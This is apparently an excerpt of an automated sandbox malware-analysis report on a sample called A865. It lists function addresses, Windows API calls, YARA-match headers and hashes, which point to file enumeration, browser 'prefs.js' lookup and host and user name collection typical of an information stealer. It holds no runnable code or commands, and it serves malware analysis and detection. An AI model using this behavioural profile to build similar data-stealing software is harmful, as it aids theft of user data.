                                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
                                                            • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                            • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                            • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                            • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                            Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                              • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                              • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                              • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                              • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                              • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                            • ExitProcess.KERNEL32 ref: 004011C6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                                            • String ID:
                                                            • API String ID: 1004333139-0
                                                            • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                            • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                            • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                            • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                            Function 00849EDD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00849F2E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_849000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: f16c706fcd213dc5d313eb480a28e9fcd5bd72fab859ae2d2566c9293fbe6fe0
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 53112B79A00208EFDB01DF98C985E99BBF5EF08350F058094F9489B362D771EE90DB81

                                                            Non-executed Functions

                                                            Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 004138CC
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                            • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                            • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                            • API String ID: 1125553467-817767981
                                                            • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                            • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                            • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                            • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                            Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 0041492C
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                            • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                            • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                            • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID: %s\%s$%s\%s$%s\*
                                                            • API String ID: 180737720-445461498
                                                            • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                            • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                            • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                            • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                            Function 022E3B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 022E3B33
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 022E3B4A
                                                            • lstrcat.KERNEL32(?,?), ref: 022E3B9C
                                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 022E3BAE
                                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 022E3BC4
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022E3ECE
                                                            • FindClose.KERNEL32(000000FF), ref: 022E3EE3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                            • String ID:
                                                            • API String ID: 1125553467-0
                                                            • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                            • Instruction ID: a8a3bb34af7e2500e80b847235b5e56733963ffb6ca62fefeb3cc3aa77d66708
                                                            • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                            • Instruction Fuzzy Hash: 9FA15EB5A50218ABDF24EFA4CC84FFE737AAF49301F444588A50E96144DB759B84CF62
                                                            Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                            • wsprintfA.USER32 ref: 004145A6
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                            • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                            • lstrcatA.KERNEL32(?,00876020,?,00000104), ref: 004146C5
                                                            • lstrcatA.KERNEL32(?,00879A78), ref: 004146D8
                                                            • lstrlenA.KERNEL32(?), ref: 004146E5
                                                            • lstrlenA.KERNEL32(?), ref: 004146F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                            • String ID: %s\%s$%s\*
                                                            • API String ID: 13328894-2848263008
                                                            • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                            • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                            • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                            • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                            Function 022E4B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 022E4B93
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                                            • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                                            • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                                            • FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID:
                                                            • API String ID: 180737720-0
                                                            • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                            • Instruction ID: 838f3d4b9aca469d24645bc8798263f46c75174758c5e8897a35c85a1cb03794
                                                            • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                            • Instruction Fuzzy Hash: 0E6174B5950218ABDF20EFE0DD48FEA73BDFB49300F44858CA60A92144EB75A785CF91
                                                            Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 00413EC3
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                            • FindClose.KERNEL32(000000FF), ref: 00414081
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID: %s\%s
                                                            • API String ID: 180737720-4073750446
                                                            • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                            • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                            • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                            • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                            Function 022E47D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
                                                            • wsprintfA.USER32 ref: 022E480D
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 022E4824
                                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022E4852
                                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022E4868
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022E48F2
                                                            • FindClose.KERNEL32(000000FF), ref: 022E4907
                                                            • lstrcat.KERNEL32(?,0064A524), ref: 022E492C
                                                            • lstrcat.KERNEL32(?,0064A22C), ref: 022E493F
                                                            • lstrlen.KERNEL32(?), ref: 022E494C
                                                            • lstrlen.KERNEL32(?), ref: 022E495D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                            • String ID:
                                                            • API String ID: 671575355-0
                                                            • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                            • Instruction ID: f81b566ba7c6c0ce209fa75edb4fb1f2668fc2caa8d57bb3833e0d5d236d5231
                                                            • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                            • Instruction Fuzzy Hash: 415164B5590218ABDB24EBF0DD88FED737DAB58300F804588E64A96194EB749B84CF91
                                                            Function 022E4107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 022E412A
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 022E4141
                                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022E416F
                                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022E4185
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022E42D3
                                                            • FindClose.KERNEL32(000000FF), ref: 022E42E8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID:
                                                            • API String ID: 180737720-0
                                                            • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                            • Instruction ID: 78c0d789e220c9b51374007d8883cbcc2a84244c651a21ddc6774845ccc9e87f
                                                            • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                            • Instruction Fuzzy Hash: 265160B6910218ABCF24FBF0DD84EEA737DBB58300F40858CA64A96054EB759B85CF95
                                                            Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 0040ED3E
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                            • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                            • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                            • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID: %s\*.*
                                                            • API String ID: 180737720-1013718255
                                                            • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                            • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                            • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                            • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                            Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                            • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                            • String ID: 4@$\*.*
                                                            • API String ID: 2325840235-1993203227
                                                            • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                            • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                            • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                            • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                            Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                            • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID: prefs.js
                                                            • API String ID: 3334442632-3783873740
                                                            • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                            • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                            • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                            • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                            Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                            • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                            • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                            • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                            • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                            • String ID: \*.*
                                                            • API String ID: 1415058207-1173974218
